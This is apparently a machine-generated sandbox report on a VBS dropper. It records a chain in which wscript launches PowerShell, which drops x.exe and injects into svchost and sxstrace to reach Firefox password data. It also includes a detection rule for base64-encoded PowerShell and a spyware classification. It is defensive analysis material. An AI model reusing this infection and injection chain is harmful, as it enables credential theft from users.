Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72C60 NtCreateKey,	6_2_03B72C60

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E8A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

5_2_00E8A1EF

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E78310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

5_2_00E78310

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

5_2_00E851BD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFAAB4316BF	3_2_00007FFAAB4316BF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E4D975	5_2_00E4D975
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E421C5	5_2_00E421C5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E562D2	5_2_00E562D2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00EA03DA	5_2_00EA03DA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E5242E	5_2_00E5242E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E425FA	5_2_00E425FA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E366E1	5_2_00E366E1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E2E6A0	5_2_00E2E6A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E7E616	5_2_00E7E616
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E5878F	5_2_00E5878F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E88889	5_2_00E88889
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E56844	5_2_00E56844
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00EA0857	5_2_00EA0857
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E38808	5_2_00E38808
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E4CB21	5_2_00E4CB21
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E56DB6	5_2_00E56DB6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E36F9E	5_2_00E36F9E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E33030	5_2_00E33030
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E4F1D9	5_2_00E4F1D9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E43187	5_2_00E43187
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E21287	5_2_00E21287
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E41484	5_2_00E41484
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E35520	5_2_00E35520
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E47696	5_2_00E47696
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E35760	5_2_00E35760
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E41978	5_2_00E41978
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E59AB5	5_2_00E59AB5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E2FCE0	5_2_00E2FCE0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00EA7DDB	5_2_00EA7DDB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E4BDA6	5_2_00E4BDA6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E41D90	5_2_00E41D90
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E33FE0	5_2_00E33FE0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E2DF00	5_2_00E2DF00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00DE35F0	5_2_00DE35F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00418B23	6_2_00418B23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00401000	6_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042F153	6_2_0042F153
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00403180	6_2_00403180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041035A	6_2_0041035A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00410363	6_2_00410363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00401B68	6_2_00401B68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00401B70	6_2_00401B70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402C4D	6_2_00402C4D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402C50	6_2_00402C50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402490	6_2_00402490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00416D1E	6_2_00416D1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00416D23	6_2_00416D23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00410583	6_2_00410583
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040E583	6_2_0040E583
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040E6C7	6_2_0040E6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040E6D3	6_2_0040E6D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402780	6_2_00402780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B8739A	6_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C003E6	6_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E3F0	6_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF132D	6_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFA352	6_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2D34C	6_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B452A0	6_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4B1B0	6_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C001AA	6_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF81CC	6_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDA118	6_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0B16B	6_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B30100	6_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F172	6_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B7516C	6_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF70E9	6_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFF0E0	6_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF0CC	6_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B470C0	6_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFF7B0	6_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3C7C0	6_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40770	6_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B64750	6_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5C6E0	6_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF16CC	6_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDD5B0	6_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C00591	6_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40535	6_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF7571	6_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEE4F6	6_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFF43F	6_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B31460	6_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF2446	6_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5FB80	6_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B7DBF9	6_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF6BD7	6_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFFB76	6_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFAB40	6_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BDDAAC	6_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B85AA0	6_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3EA80	6_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEDAC6	6_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB3A6C	6_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFFA49	6_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF7A46	6_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B429A0	6_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0A9A6	6_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B56962	6_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B49950	6_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B950	6_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B268B8	6_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6E8F0	6_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B438E0	6_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B42840	6_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4A840	6_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFFFB1	6_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B41F92	6_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4CFE0	6_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B32FC8	6_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B60F30	6_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B82F28	6_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFFF09	6_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB4F40	6_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B49EB0	6_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B52E90	6_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFCE93	6_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFEEDB	6_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFEE26	6_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40E59	6_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B58DBF	6_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3ADE0	6_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5FDC0	6_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4AD00	6_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF7D73	6_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF1D5A	6_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B43D40	6_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0CB5	6_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B30CF2	6_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFFCF2	6_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB9C32	6_2_03BB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B40C00	6_2_03B40C00
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03308199	8_2_03308199
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_0330818D	8_2_0330818D
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_0330A049	8_2_0330A049
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03308049	8_2_03308049
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033107E4	8_2_033107E4
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033107E9	8_2_033107E9
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03309E20	8_2_03309E20
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03309E29	8_2_03309E29
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03328C19	8_2_03328C19

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 263 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 00E40AE3 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 00E27DE1 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 00E48900 appears 42 times

Source: doc00250120.Vbs.vbs

Initial sample: Strings found which are bigger than 50

Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/9@7/7

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E8A06A GetLastError,FormatMessageW,

5_2_00E8A06A

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E781CB AdjustTokenPrivileges,CloseHandle,		5_2_00E781CB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		5_2_00E787E1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E8B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_00E8B3FB

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E9EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00E9EE0D

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

5_2_00E983BB

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E24E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_00E24E89

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\exl04d3r[1]

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03

Source: C:\Windows\System32\wscript.exe

File created: C:\Temp\script.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sxstrace.exe, 00000009.00000003.1994550774.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2690176062.0000000002E82000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1991901678.0000000002E82000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2690176062.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1991720816.0000000002E61000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Process created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"
Source: C:\Windows\SysWOW64\sxstrace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Process created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
